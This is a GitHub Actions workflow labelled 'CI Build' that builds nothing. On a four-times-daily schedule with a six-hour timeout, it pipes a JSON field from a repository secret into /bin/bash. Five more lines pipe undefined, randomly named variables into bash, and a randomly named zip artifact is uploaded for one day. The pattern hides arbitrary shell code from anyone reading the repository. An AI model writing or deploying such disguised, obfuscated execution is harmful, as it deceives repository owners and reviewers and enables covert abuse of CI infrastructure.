name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '36 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          nfn3: ${{ secrets.nfn3 }}
        run: |
          printf '%s' "$nfn3" | jq -r .xjgt8722 | /bin/bash
          echo $c081 | jq -r .g3 | /bin/bash
          printf '%s' "$ztaj91921" | jq -r .sxo3 | /bin/bash
          echo $sd8 | jq -r .adfo22 | /bin/bash
          echo $qldyv6 | jq -r .sgyx350 | /bin/bash
          echo $upq861 | jq -r .gpfa160 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 7ZkhBhDt
          path: "*.zip"
          retention-days: 1
